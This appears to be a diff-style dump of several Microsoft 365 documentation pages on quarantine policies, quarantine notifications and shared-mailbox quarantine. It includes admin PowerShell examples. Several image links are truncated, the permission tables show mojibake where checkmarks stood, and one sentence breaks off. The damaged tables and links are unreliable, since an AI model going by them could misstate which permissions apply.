- After you select **Add**, the configured settings for the language appear in the **Click the language to show the previously configured settings** box. To reload the settings, click on the language name. To remove the language, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false":::.
-
- :::image type="content" source="../../media/quarantine-tags-esn-customization-selected-languages.png" alt-text="The selected languages in the global quarantine notification settings of quarantine policies." lightbox="../../media/quarantine-tags-esn-customization-selected-languages.png":::
-
- 4. Repeat the previous steps to create a maximum of three customized quarantine notifications based on the recipient's language.
-
-4. When you're finished on the **Quarantine notifications** flyout, select **Save**.
-
- :::image type="content" source="../../medio-quarantine-policy-quarantine-notification-settings.png":::
-
-For information about the **Specify sender address**
-
-### Customize all quarantine notifications
-
-Even if you don't customize quarantine notifications for different languages, settings are available in the **Quarantine notifications flyout** to customize all quarantine notifications. Or, you can configure the settings before, during, or after you customize quarantine notifications for different languages (these settings apply to all languages):
--- **Specify sender address**: Select an existing user for the sender email address of quarantine notifications. The default sender is `quarantine@messaging.microsoft.com`.--- **Use my company logo**: Select this option to replace the default Microsoft logo that's used at the top of quarantine notifications. Before you do this step, you need to follow the instructions in [Customize the Microsoft 365 theme for your organization](../../admin/setup/customize-your-organization-theme.md) to upload your custom logo.-
- A custom logo in a quarantine notification is shown in the following screenshot:
-
- :::image type="content" source="../../media/quarantine-tags-esn-customization-logo.png" alt-text="A custom logo in a quarantine notification" lightbox="../../media/quarantine-tags-esn-customization-logo.png":::
--- **Send end-user spam notification every (days)**: Select the frequency for quarantine notifications. You can select **Within 4 hours**, **Daily**, or **Weekly**.-
- > [!TIP]
- > If you select every four hours, and a message is quarantined _just after_ the last notification generation, the recipient will receive the quarantine notification _slightly more than_ four hours later.
-
-When you're finished in the **Quarantine notifications flyout**, select **Save**.
-
-### Use PowerShell to configure global quarantine notification settings
-
-If you'd rather use PowerShell to configure global quarantine notification settings, connect to Exchange Online PowerShell or Exchange Online Protection PowerShell and use the following syntax:
-
-```powershell
-Get-QuarantinePolicy -QuarantinePolicyType GlobalQuarantinePolicy | Set-QuarantinePolicy -MultiLanguageSetting ('Language1','Language2','Language3') -MultiLanguageCustomDisclaimer ('Language1 Disclaimer','Language2 Disclaimer','Language3 Disclaimer') -ESNCustomSubject ('Language1 Subject','Language2 Subject','Language3 Subject') -MultiLanguageSenderName ('Language1 Sender Display Name','Language2 Sender Display Name','Language3 Sender Display Name') [-EndUserSpamNotificationCustomFromAddress <InternalUserEmailAddress>] [-OrganizationBrandingEnabled <$true | $false>] [-EndUserSpamNotificationFrequency <04:00:00 | 1.00:00:00 | 7.00:00:00>]
-```
-
-**Notes**:
--- You can specify a maximum of 3 available languages. The value Default is en-US. The value English is everything else (en-GB, en-CA, en-AU, etc.).-- For each language, you need to specify unique _MultiLanguageCustomDisclaimer_, _ESNCustomSubject_, and _MultiLanguageSenderName_ values.-- If any of the text values contain quotation marks, you need to escape the quotation mark with an additional quotation mark. For example, change `d'assistance` to `d''assistance`.-
-This example configures the following settings:
--- Customized quarantine notifications for US English and Spanish.-- The quarantine notification sender's email address is set to michelle@contoso.onmicrosoft.com.-
-```powershell
-Get-QuarantinePolicy -QuarantinePolicyType GlobalQuarantinePolicy | Set-QuarantinePolicy -MultiLanguageSetting ('Default','Spanish') -MultiLanguageCustomDisclaimer ('For more information, contact the Help Desk.','Para obtener más información, comuníquese con la mesa de ayuda.') -ESNCustomSubject ('You have quarantined messages','Tienes mensajes en cuarentena') -MultiLanguageSenderName ('Contoso administrator','Administradora de contoso') -EndUserSpamNotificationCustomFromAddress michelle@contoso.onmicrosoft.com
-```
-
-For detailed syntax and parameter information, see [Set-QuarantinePolicy](/powershell/module/exchange/set-quarantinepolicy).
-
-## View quarantine policies in the Microsoft Defender portal
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> **Quarantine policies** in the **Rules** section. Or, to go directly to the **Quarantine policies** page, use <https://security.microsoft.com/quarantinePolicies>.
-
-2. The **Quarantine policies** page shows the list of policies by **Policy name** and **Last updated** date/time.
-
-3. To view the settings of default or custom quarantine policies, select the policy by clicking anywhere in the row other than the check box next to the name. Details are available in the flyout that opens.
-
-4. To view the global settings, select **Global settings**
-
-### View quarantine policies in PowerShell
-
-If you'd rather use PowerShell to view quarantine policies, do any of the following steps:
--- To view a summary list of all default or custom policies, run the following command:-
- ```powershell
- Get-QuarantinePolicy | Format-Table Name
- ```
--- To view the settings of default or custom quarantine policies, replace \<QuarantinePolicyName\> with the name of the quarantine policy, and run the following command:-
- ```powershell
- Get-QuarantinePolicy -Identity "<QuarantinePolicyName>"
- ```
--- To view the global settings for quarantine notifications, run the following command:-
- ```powershell
- Get-QuarantinePolicy -QuarantinePolicyType GlobalQuarantinePolicy
- ```
-
-For detailed syntax and parameter information, see [Get-HostedContentFilterPolicy](/powershell/module/exchange/get-hostedcontentfilterpolicy).
-
-## Modify quarantine policies in the Microsoft Defender portal
-
-You can't modify the default quarantine policies named AdminOnlyAccessPolicy, DefaultFullAccessPolicy, or DefaultFullAccessWithNotificationPolicy.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> **Quarantine policies** in the **Rules** section. Or, to go directly to the **Quarantine policies** page, use <https://security.microsoft.com/quarantinePolicies>.
-
-2. On the **Quarantine policies** page, select the policy by clicking the check box next to the name.
-
-3. Select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit policy** action that appears.
-
-The policy wizard opens with the settings and values of the selected quarantine policy. The steps are virtually the same as described in the [Create quarantine policies in the Microsoft Defender portal](#step-1-create-quarantine-policies-in-the-microsoft-defender-portal) section. The main difference is: you can't rename an existing policy.
-
-### Modify quarantine policies in PowerShell
-
-If you'd rather use PowerShell to modify a custom quarantine policy, replace \<QuarantinePolicyName\> with the name of the quarantine policy, and use the following syntax:
-
-```powershell
-Set-QuarantinePolicy -Identity "<QuarantinePolicyName>" [Settings]
-```
-
-The available settings are the same as described for creating quarantine policies earlier in this article.
-
-For detailed syntax and parameter information, see [Set-QuarantinePolicy](/powershell/module/exchange/set-quarantinepolicy).
-
-## Remove quarantine policies in the Microsoft Defender portal
-
-> [!NOTE]
-> Don't remove a quarantine policy until you verify that it isn't being used. For example, run the following command in PowerShell:
-
-> ```powershell
-> Write-Output -InputObject "Anti-spam policies",("-"*25);Get-HostedContentFilterPolicy | Format-List Name,*QuarantineTag; Write-Output -InputObject "Anti-phishing policies",("-"*25);Get-AntiPhishPolicy | Format-List Name,*QuarantineTag; Write-Output -InputObject "Anti-malware policies",("-"*25);Get-MalwareFilterPolicy | Format-List Name,QuarantineTag; Write-Output -InputObject "Safe Attachments policies",("-"*25);Get-SafeAttachmentPolicy | Format-List Name,QuarantineTag
-> ```
->
-> If the quarantine policy is being used, [replace the assigned quarantine policy](#step-2-assign-a-quarantine-policy-to-supported-features) before you remove it to avoid the potential disruption in quarantine notifications.
->
-> You can't remove the default quarantine policies named AdminOnlyAccessPolicy, DefaultFullAccessPolicy, or DefaultFullAccessWithNotificationPolicy.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> **Quarantine policies** in the **Rules** section. Or, to go directly to the **Quarantine policies** page, use <https://security.microsoft.com/quarantinePolicies>.
-
-2. On the **Quarantine policies** page, select the policy by clicking the check box next to the name.
-
-3. Select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** action that appears.
-
-4. Select **Remove policy** in the confirmation dialog.
-
-### Remove quarantine policies in PowerShell
-
-If you'd rather use PowerShell to remove a custom quarantine policy, replace \<QuarantinePolicyName\> with the name of the quarantine policy, and run the following command:
-
-```powershell
-Remove-QuarantinePolicy -Identity "<QuarantinePolicyName>"
-```
-
-For detailed syntax and parameter information, see [Remove-QuarantinePolicy](/powershell/module/exchange/remove-quarantinepolicy).
-
-## System alerts for quarantine release requests
-
-By default, the default alert policy named **User requested to release a quarantined message** automatically generates an informational alert and sends notification to Organization Management (global administrator) whenever a user requests the release of a quarantined message:
-
-Admins can customize the email notification recipients or create a custom alert policy for more options.
-
-For more information about alert policies, see [Alert policies in the Microsoft Defender portal](alert-policies-defender-portal.md).
-
-## Appendix
-
-### Anatomy of a quarantine policy
-
-A quarantine policy contains _permissions_ that are combined into _preset permission groups_. The preset permissions groups are:
--- No access-- Limited access-- Full access-
-As previously described, _default quarantine policies_ enforce historical user capabilities on quarantined messages, and are automatically assigned to actions in [supported protection features](#step-2-assign-a-quarantine-policy-to-supported-features) that quarantine messages.
-
-The default quarantine policies are:
--- AdminOnlyAccessPolicy-- DefaultFullAccessPolicy-- DefaultFullAccessWithNotificationPolicy-- NotificationEnabledPolicy (in some organizations)-
-Quarantine policies also control whether users receive _quarantine notifications_ about messages that were quarantined instead of delivered to them. Quarantine notifications do two things:
--- Inform the user that the message is in quarantine.-- Allow users to view and take action on the quarantined message from the quarantine notification. Permissions control what the user can do in the quarantine notification as described in the [Quarantine policy permission details](#quarantine-policy-permission-details) section.-
-The relationship between permissions, permissions groups, and the default quarantine policies are described in the following tables:
-
-|Permission|No access|Limited access|Full access|
-||::|::|::|
-|(_PermissionToViewHeader_)┬╣|Γ£ö|Γ£ö|Γ£ö|
-|**Block sender** (_PermissionToBlockSender_)||Γ£ö|Γ£ö|
-|**Delete** (_PermissionToDelete_)||Γ£ö|Γ£ö|
-|**Preview** (_PermissionToPreview_)┬▓||Γ£ö|Γ£ö|
-|**Allow recipients to release a message from quarantine** (_PermissionToRelease_)┬│|||Γ£ö|
-|**Allow recipients to request a message to be released from quarantine** (_PermissionToRequestRelease_)||Γ£ö||
-
-|Default quarantine policy|Permission group used|Quarantine notifications enabled?|
-||::|::|
-|AdminOnlyAccessPolicy|No access|No|
-|DefaultFullAccessPolicy|Full access|No|
-|DefaultFullAccessWithNotificationPolicy⁴|Full access|Yes|
-|NotificationEnabledPolicy⁵|Full access|Yes|
-
-┬╣ This permission isn't available in the Defender portal. Turning off the permission in PowerShell doesn't affect the availability of the :::image type="icon" source="../../media/m365-cc-sc-view-message-headers-icon.png" border="false"::: **View message header** action on quarantined messages. If the message is visible to a user in quarantine, the action is always available for the message.
-
-┬▓ The **Preview** permission is unrelated to the **Review message** action that's available in quarantine notifications.
-
-┬│ **Allow recipients to release a message from quarantine** isn't honored for messages that were quarantined as **malware** by anti-malware policies or Safe Attachments policies, or as **high confidence phishing** by anti-spam policies.
-
-⁴ This policy is used in [preset security policies](preset-security-policies.md) to enable quarantine notifications instead of the policy named DefaultFullAccessPolicy where notifications are turned off.
-
-⁵ Your organization might not have the policy named NotificationEnabledPolicy as described in the next section.
-
-#### Full access permissions and quarantine notifications
-
-The default quarantine policy named DefaultFullAccessPolicy duplicates the historical _permissions_ for less harmful quarantined messages, but _quarantine notifications_ aren't turned on in the quarantine policy. Where DefaultFullAccessPolicy is used by default is described in the feature tables in [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md).
-
-To give organizations the permissions of DefaultFullAccessPolicy with quarantine notifications turned on, we selectively included a default policy named NotificationEnabledPolicy based on the following criteria:
--- The organization existed before the introduction of quarantine policies (July-August 2021).-
- **and**
--- The **Enable end-user spam notifications** setting was turned on in one or more [anti-spam policies](anti-spam-policies-configure.md). Before the introduction of quarantine policies, this setting determined whether users received notifications about their quarantined messages.-
-Newer organizations or older organizations that never turned on end-user spam notifications don't have the policy named NotificationEnabledPolicy.
-
-To give users **Full access** permissions _and_ quarantine notifications, organizations that don't have the NotificationEnabledPolicy policy have the following options:
--- Use the default policy named DefaultFullAccessWithNotificationPolicy.-- Create and use custom quarantine policies with **Full access** permissions and quarantine notifications turned on.-
-### Quarantine policy permission details
-
-The following sections describe the effects of preset permission groups and individual permissions for users in quarantined messages and in quarantine notifications.
-
-> [!NOTE]
-> As explained earlier, quarantine notifications are turned on only in the default policies named DefaultFullAccessWithNotificationPolicy or ([if your organization is old enough](#full-access-permissions-and-quarantine-notifications)) NotificationEnabledPolicy.
-
-#### Preset permissions groups
-
-The individual permissions that are included in preset permission groups are described in the [Anatomy of a quarantine policy](#anatomy-of-a-quarantine-policy) section.
-
-##### No access
-
-The effect of **No access** permissions (admin only access) on user capabilities depends on the state of quarantine notifications in the quarantine policy:
--- **Quarantine notifications turned off**:
- - **On the Quarantine page**: Quarantined messages aren't visible to users.
- - **In quarantine notifications**: Users don't receive quarantine notifications for the messages.
--- **Quarantine notifications turned on**:
- - **On the Quarantine page**: Quarantined messages are visible to users, but the only available action is :::image type="icon" source="../../medi#view-email-message-headers).
- - **In quarantine notifications**: Users receive quarantine notifications, but the only available action is **Review message**.
-
-##### Limited access
-
-If the quarantine policy assigns **Limited access** permissions, users get the following capabilities:
--- **On the Quarantine page and in the message details in quarantine**: The following actions are available:
- - :::image type="icon" source="../../medi#request-the-release-of-quarantined-email) (the difference from **Full access** permissions)
- - :::image type="icon" source="../../medi#delete-email-from-quarantine)
- - :::image type="icon" source="../../medi#preview-email-from-quarantine)
- - :::image type="icon" source="../../medi#view-email-message-headers)
- - :::image type="icon" source="../../medi#block-email-senders-from-quarantine)
--- **In quarantine notifications**: The following actions are available:
- - **Review message**
- - **Request release** (the difference from **Full access** permissions)
- - **Block sender**
-
-##### Full access
-
-If the quarantine policy assigns **Full access** permissions (all available permissions), users get the following capabilities:
--- **On the Quarantine page and in the message details in quarantine**: The following actions are available:
- - :::image type="icon" source="../../medi#release-quarantined-email) (the difference from **Limited access** permissions)
- - :::image type="icon" source="../../medi#delete-email-from-quarantine)
- - :::image type="icon" source="../../medi#preview-email-from-quarantine)
- - :::image type="icon" source="../../medi#view-email-message-headers)
- - :::image type="icon" source="../../medi#block-email-senders-from-quarantine)
--- **In quarantine notifications**: The following actions are available:
- - **Review message**
- - **Release** (the difference from **Limited access** permissions)
- - **Block sender**
-
-#### Individual permissions
-
-##### Block sender permission
-
-The **Block sender** permission (_PermissionToBlockSender_) allows users to add the message sender to the Blocked Senders list in their mailbox.
-
-If the **Block sender** permission is enabled:
--- :::image type="icon" source="../../medi#block-email-senders-from-quarantine) is available on the **Quarantine** page and in the message details in quarantine.-- **Blocked sender** is available in quarantine notifications.-
- For this permission to work correctly in quarantine notifications, users need to be enabled for remote PowerShell. For instructions, see [Enable or disable access to Exchange Online PowerShell](/powershell/exchange/disable-access-to-exchange-online-powershell).
-
-If the **Block sender** permission is disabled, users can't block senders from quarantine or in quarantine notifications (the action isn't available).
-
-For more information about the Blocked Senders list, see [Block messages from someone](https://support.microsoft.com/office/274ae301-5db2-4aad-be21-25413cede077#__toc304379667) and [Use Exchange Online PowerShell to configure the safelist collection on a mailbox](configure-junk-email-settings-on-exo-mailboxes.md#use-exchange-online-powershell-to-configure-the-safelist-collection-on-a-mailbox).
-
-> [!TIP]
-> The organization can still receive mail from the blocked sender. Messages from the sender are delivered to user Junk Email folders or to quarantine. To delete messages from the sender upon arrival, use [mail flow rules](/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules) (also known as transport rules) to **Block the message**.
-
-##### Delete permission
-
-The **Delete** permission (_PermissionToDelete_) allows users to delete their own messages from quarantine (messages where they're a recipient).
-
-If the **Delete** permission is enabled:
--- :::image type="icon" source="../../medi#delete-email-from-quarantine) is available on the **Quarantine** page and in the message details in quarantine.-- No effect in quarantine notifications. Deleting a quarantined message from the quarantine notification is not possible.-
-If the **Delete** permission is disabled, users can't delete their own messages from quarantine (the action isn't available).
-
-> [!TIP]
-> Admins can find out who deleted a quarantined message by searching the admin audit log. For instructions, see [Find who deleted a quarantined message](quarantine-admin-manage-messages-files.md#find-who-deleted-a-quarantined-message). Admins can use [message trace](message-trace-defender-portal.md) to find out what happened to a released message if the original recipient can't find it.
-
-##### Preview permission
-
-The **Preview** permission (_PermissionToPreview_) allows users to preview their messages in quarantine.
-
-If the **Preview** permission is enabled:
--- :::image type="icon" source="../../medi#preview-email-from-quarantine) is available on the **Quarantine** page and in the message details in quarantine.-- No effect in quarantine notifications. Previewing a quarantined message from the quarantine notification isn't possible. The **Review message** action in quarantine notifications takes users to the details flyout of the message in quarantine where they can preview the message.-
-If the **Preview** permission is disabled, users can't preview their own messages in quarantine (the action isn't available).
-
-##### Allow recipients to release a message from quarantine permission
-
-> [!NOTE]
-> As explained previously, this permission isn't honored for messages that were quarantined as **malware** by anti-malware or Safe Attachments policies, or as **high confidence phishing** by anti-spam policies. If the quarantine policy gives users this permission, users are instead allowed to _request_ the release of their quarantined malware or high confidence phishing messages.
-
-The **Allow recipients to release a message from quarantine** permission (_PermissionToRelease_) allows users to release their own quarantined messages without admin approval.
-
-If the **Allow recipients to release a message from quarantine** permission is enabled:
--- :::image type="icon" source="../../medi#release-quarantined-email) is available on the **Quarantine** page and in the message details in quarantine.-- **Release** is available in quarantine notifications.-
-If the **Allow recipients to release a message from quarantine** permission is disabled, users can't release their own messages from quarantine or in quarantine notifications (the action isn't available).
-
-##### Allow recipients to request a message to be released from quarantine permission
-
-The **Allow recipients to request a message to be released from quarantine** permission (_PermissionToRequestRelease_) allows users to _request_ the release of their quarantined messages. Messages are released only after an admin approves the request.
-
-If the **Allow recipients to request a message to be released from quarantine** permission is enabled:
--- :::image type="icon" source="../../medi#request-the-release-of-quarantined-email) is available on the **Quarantine** page and in the message details in quarantine.-- **Request release** is available in quarantine notifications.-
-If the **Allow recipients to request a message to be released from quarantine** permission is disabled, users can't request the release of their own messages from quarantine or in quarantine notifications (the action isn't available).
security Quarantine Quarantine Notifications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/quarantine-quarantine-notifications.md
- Title: Quarantine notifications (end-user spam notifications) in Microsoft 365
- - NOCSH
----
- - MOE150
- - MED150
- - MET150
-
- - m365-security
- - tier1
-
- - seo-marvel-apr2020
-description: Admins can learn about end-user spam notifications for quarantined messages in Exchange Online Protection (EOP).
- Previously updated : 12/11/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Use quarantine notifications to release and report quarantined messages
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, quarantine holds potentially dangerous or unwanted messages. For more information, see [Quarantined messages in EOP](quarantine-about.md).
-
-> [!NOTE]
-> In Microsoft 365 operated by 21Vianet, quarantine isn't currently available in the Microsoft Defender portal. Quarantine is available only in the classic Exchange admin center (classic EAC).
-
-For [supported protection features](quarantine-policies.md#step-2-assign-a-quarantine-policy-to-supported-features), _quarantine policies_ define what users are allowed to do to quarantined messages based on why the message was quarantined. Default quarantine policies enforce the historical capabilities for the security feature that quarantined the message as described in the table [here](quarantine-end-user.md). Admins can create and apply custom quarantine policies that define less restrictive or more restrictive capabilities for users. For more information, see [Create quarantine policies](quarantine-policies.md#step-1-create-quarantine-policies-in-the-microsoft-defender-portal).
-
-Quarantine notifications aren't turned on in the default quarantine notifications named AdminOnlyAccessPolicy or DefaultFullAccessPolicy. Quarantine notifications are turned on in the following default quarantine policies:
--- **DefaultFullAccessWithNotificationPolicy** that's used in [preset security policies](preset-security-policies.md).-- **NotificationEnabledPolicy** [if your organization has it](quarantine-policies.md#full-access-permissions-and-quarantine-notifications).-
-Otherwise, to turn on quarantine notifications in quarantine policies, you need to [create and configure a new quarantine policy](quarantine-policies.md#step-1-create-quarantine-policies-in-the-microsoft-defender-portal).
-
-Admins can also use the global settings in quarantine policies to customize quarantine notifications in the following ways:
--- Add translations in up to three languages.-- Customize the sender and logo that's used in the notification.-- Notification frequency (every four hours, daily, or weekly).-
-For instructions, see [Configure global quarantine notification settings](quarantine-policies.md#configure-global-quarantine-notification-settings-in-the-microsoft-defender-portal).
-
-For shared mailboxes, quarantine notifications are supported only for users who are granted FullAccess permission to the mailbox. For more information, see [Use the EAC to edit shared mailbox delegation](/Exchange/collaboration-exo/shared-mailboxes#use-the-eac-to-edit-shared-mailbox-delegation).
-
-> [!NOTE]
-> By default, messages that are quarantined as high confidence phishing by anti-spam policies, malware by anti-malware policies or Safe Attachments, or by mail flow rules (also known as transport rules) are available only to admins. For more information, see the table at [Find and release quarantined messages as a user in EOP](quarantine-end-user.md).
->
-> Quarantine notifications for messages sent to distribution groups or mail-enabled security groups are sent to all group members.
->
-> Quarantine notifications for messages sent to Microsoft 365 Groups are sent to all group members only if the **Send copies of group conversations and events to group members** setting is turned on.
-
-When users receive a quarantine notification, the following information is available for each quarantined message:
--- **Sender**: The email address of the sender of the quarantined message.-- **Subject**: The Subject line of the quarantined message.-- **Date**: The date/time that the message was quarantined in UTC.-
-The actions that are available for messages in the quarantine notification depends on why the message was quarantined and the permissions in the associated quarantine policy. For more information, see [Quarantine policy permission details](quarantine-policies.md#quarantine-policy-permission-details).
--- **Review message**: Available for all messages in quarantine notifications.-
- Selecting the action takes you to the details flyout of the message in quarantine. It's the same result as going to the **Email** tab on the **Quarantine** page at <https://security.microsoft.com/quarantine?viewid=Email>, and selecting the message by clicking anywhere in the row other than the check box next to the first column. For more information, see [View quarantined message details](quarantine-end-user.md#view-quarantined-message-details).
--- **Release**: Available for messages that were quarantined by features using a quarantine policy with the **Full access** permission group or the individual **Allow recipients to release a message from quarantine** (_PermissionToRelease_) permission. For example, DefaultFullAccessWithNotificationPolicy, NotificationEnabledPolicy, or custom quarantine policies.-
- Selecting the action opens an informational web page that acknowledges the message was released from quarantine (for example, **Spam message was released from quarantine**). The **Release status** value of the message on the **Email** tab of the **Quarantine** page is **Released**. The message is delivered to the user's Inbox (or some other folder, depending on any [Inbox rules](https://support.microsoft.com/office/c24f5dea-9465-4df4-ad17-a50704d66c59) in the mailbox).
-
- Users can't release their own messages that were quarantined as **malware** by anti-malware or Safe Attachments policies, or as **high confidence phishing** by anti-spam policies, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware or high confidence phishing messages.
--- **Request release**: Available for messages that were quarantined by features using a quarantine policy with the **Limited access** permission group or the individual **Allow recipients to request a message to be released from quarantine** (_PermissionToRequestRelease_) permission. For example, custom quarantine policies.-
- Selecting the action opens an informational web page that acknowledges the request to release the message from quarantine (**The message release request has been initiated. The tenant admin will determine if the request should be approved or denied.**). The **Release status** value of the message on the **Email** tab of the **Quarantine** page is **Release requested**.
--- **Block Sender**: Available for messages that were quarantined by features using a quarantine policy with the **Full access**or **Limited access** permission group, or the individual ***Block sender** (_PermissionToBlockSender_) permission. For example, DefaultFullAccessWithNotificationPolicy, NotificationEnabledPolicy, or custom quarantine policies.-
- This action opens an informational web page to acknowledge that the message was added to the Blocked Senders list in the user's mailbox (for example, **Spam message sender was blocked in quarantine**).
-
- For more information about the Blocked Senders list, see [Block messages from someone](https://support.microsoft.com/office/274ae301-5db2-4aad-be21-25413cede077#__toc304379667) and [Use Exchange Online PowerShell to configure the safelist collection on a mailbox](configure-junk-email-settings-on-exo-mailboxes.md#use-exchange-online-powershell-to-configure-the-safelist-collection-on-a-mailbox).
-
- > [!TIP]
- > The organization can still receive mail from the blocked sender. Messages from the sender are delivered to user Junk Email folders or to quarantine. To delete messages from the sender upon arrival, use [mail flow rules](/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules) (also known as transport rules) to **Block the message**.
-
security Quarantine Shared Mailbox Messages https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/quarantine-shared-mailbox-messages.md
- Title: View and release quarantined messages from shared mailboxes-----
- - MET150
-
- - m365-security
- - tier1
-description: Users can learn how to view and act on quarantined messages that were sent to shared mailboxes that they have permissions to.
- Previously updated : 7/24/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# View and release quarantined messages from shared mailboxes
--
-Users can manage quarantined messages where they're one of the recipients as described in [Find and release quarantined messages as a user in EOP](quarantine-end-user.md). But what about **shared mailboxes** where the user has Full Access and Send As or Send on Behalf permissions to the mailbox as described in [Shared mailboxes in Exchange Online](/exchange/collaboration-exo/shared-mailboxes)?
-
-Previously, the ability for users to manage quarantined messages sent to a shared mailbox required admins to leave automapping enabled for the shared mailbox (it's enabled by default when an admin gives a user access to another mailbox). However, depending on the size and number of mailboxes that the user has access to, performance can suffer as Outlooks tries to open _all_ mailboxes that the user has access to. For this reason, many admins choose to [remove automapping for shared mailboxes](/outlook/troubleshoot/profiles-and-accounts/remove-automapping-for-shared-mailbox).
-
-Now, automapping is no longer required for users to manage quarantined messages that were sent to shared mailboxes. It just works. There are two different methods to access quarantined messages that were sent to a shared mailbox:
--- If the following statements are all true:
- - An admin has configured [quarantine policies](quarantine-policies.md#anatomy-of-a-quarantine-policy) to allow quarantine notifications (formerly known as end-user spam notifications).
- - The user has access to quarantine notifications of the shared mailbox.
- - The user has Full Access permissions to the shared mailbox (directly or via a security group).
-
- The user can select **Review** in the notification to go to quarantine in the Microsoft Defender portal. This method only allows access to quarantined messages that were sent to the shared mailbox. Users can't manage their own quarantine messages in this context.
--- The user can [go to quarantine in the Microsoft Defender portal](quarantine-end-user.md) and select **Filter** to filter the results by **Recipient address** (the email address of the shared mailbox). On the main **Quarantine** page, you can click on the **Recipient** column header to sort by messages that were sent to the shared mailbox.-
-## Things to keep in mind
--- In Microsoft 365 operated by 21Vianet, quarantine isn't currently available in the Microsoft Defender portal. Quarantine is available only in the classic Exchange admin center (classic EAC).--- _Quarantine policies_ define what users are allowed to do or not do to quarantined messages based on why the message was quarantined for [supported features](quarantine-policies.md#step-2-assign-a-quarantine-policy-to-supported-features). Default quarantine policies enforce the historical capabilities for the security feature that quarantined the message as described in the table [here](quarantine-end-user.md). Admins can create and apply custom quarantine policies that define less restrictive or more restrictive capabilities for users. For more information, see [Create quarantine policies](quarantine-policies.md#step-1-create-quarantine-policies-in-the-microsoft-defender-portal).--- The first user to act on the quarantined message decides the fate of the message for everyone who uses the shared mailbox. For example, if a shared mailbox is accessed by 10 users, and a user decides to delete the quarantine message, the message is deleted for all 10 users. Likewise, if a user decides to release the message, it's released to the shared mailbox and is accessible by all other users of the shared mailbox.--- Currently, the **Block sender** button isn't available in the **Details** flyout for quarantined messages that were sent to the shared mailbox.--- Regarding quarantine operations for shared mailboxes, if you use nested security groups to grant access to a shared mailbox, we recommend no more than two levels of nested groups. For example, Group A is a member of Group B, which is a member of Group C. To assign permissions to a shared mailbox, don't add the user to Group A, and then assign Group C to the shared mailbox.--- Access to quarantined items for shared mailboxes in on-premises environments is currently not supported (directly or by using security groups).--- As of July 2022, users with primary SMTP addresses that are different from their user principal names (UPNs) should be able to access quarantined messages for the shared mailbox.--- To manage quarantined messages for the shared mailbox in [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), the user needs to use the [Get-QuarantineMessage](/powershell/module/exchange/get-quarantinemessage) cmdlet with shared mailbox email address for the value of the _RecipientAddress_ parameter to identify the messages. For example:-
- ```powershell
- Get-QuarantineMessage -RecipientAddress officeparty@contoso.com
- ```
-
- Then, the user can select a quarantined message from the list to view or take action on.
-
- This example shows all of the quarantined messages that were sent to the shared mailbox, and then releases the first message in the list from quarantine (the first message in the list is 0, the second is 1, and so on).
-
- ```powershell
- $SharedMessages = Get-QuarantineMessage -RecipientAddress officeparty@contoso.com | select -ExpandProperty Identity
- $SharedMessages
- Release-QuarantineMessage -Identity $SharedMessages[0]
- ```
-
- For detailed syntax and parameter information, see the following articles:
-
- - [Get-QuarantineMessage](/powershell/module/exchange/get-quarantinemessage)
- - [Get-QuarantineMessageHeader](/powershell/module/exchange/get-quarantinemessageheader)
- - [Preview-QuarantineMessage](/powershell/module/exchange/preview-quarantinemessage)
- - [Release-QuarantineMessage](/powershell/module/exchange/release-quarantinemessage)
security Recommended Settings For Eop And Office365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/recommended-settings-for-eop-and-office365.md
- Title: Microsoft recommendations for EOP and Defender for Office 365 security settings
-keywords: Office 365 security recommendations, Sender Policy Framework, Domain-based Message Reporting and Conformance, DomainKeys Identified Mail, steps, how does it work, security baselines, baselines for EOP, baselines for Defender for Office 365 , set up Defender for Office 365 , set up EOP, configure Defender for Office 365, configure EOP, security configuration
- - NOCSH
----
- - MET150
-
- - m365-security
- - m365initiative-defender-office365
- - highpri
- - tier1
-description: What are best practices for Exchange Online Protection (EOP) and Defender for Office 365 security settings? What's the current recommendations for standard protection? What should be used if you want to be more strict? And what extras do you get if you also use Defender for Office 365?
- Previously updated : 3/19/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
